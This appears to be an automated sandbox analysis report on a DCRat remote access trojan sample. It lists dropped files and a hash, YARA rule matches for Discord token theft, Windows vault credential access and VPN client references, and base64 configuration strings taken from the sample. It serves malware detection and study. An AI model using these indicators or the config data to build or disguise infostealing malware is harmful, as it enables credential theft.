Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01130838	31_2_01130838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011378B0	31_2_011378B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011370A8	31_2_011370A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011378C0	31_2_011378C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01135399	31_2_01135399
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0113326F	31_2_0113326F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136298	31_2_01136298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136D90	31_2_01136D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136DA0	31_2_01136DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01138C20	31_2_01138C20
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137428	31_2_01137428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01132738	31_2_01132738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01132748	31_2_01132748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137639	31_2_01137639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137648	31_2_01137648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AD290	31_2_0B5AD290
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AE8F8	31_2_0B5AE8F8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A9F48	31_2_0B5A9F48
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AF770	31_2_0B5AF770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A97B4	31_2_0B5A97B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A7E71	31_2_0B5A7E71
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AEEF0	31_2_0B5AEEF0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AF348	31_2_0B5AF348
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AE8E9	31_2_0B5AE8E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A17E9	31_2_0B5A17E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AEEE0	31_2_0B5AEEE0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A9D69	31_2_0B5A9D69
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF17B8	31_2_0EDF17B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF0C18	31_2_0EDF0C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF125F	31_2_0EDF125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF1274	31_2_0EDF1274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF17A8	31_2_0EDF17A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF0C08	31_2_0EDF0C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FF848FE542A	47_2_00007FF848FE542A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FF848FE334D	47_2_00007FF848FE334D

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Infected.exe A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Loaader.exe A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282

One or more processes crash

Source: C:\Users\user\AppData\Roaming\Loader.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe" vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinDefend.exe4 vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Binary or memory string: OriginalFilenameTESTING.exe4 vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 20.2.Loader.exe.1d000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 20.2.Loader.exe.1d000000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7280, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WinDefend.exe.0.dr

Static PE information: Section: %q2hF6 ZLIB complexity 1.0006310096153845

Source: Client.exe.0.dr, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
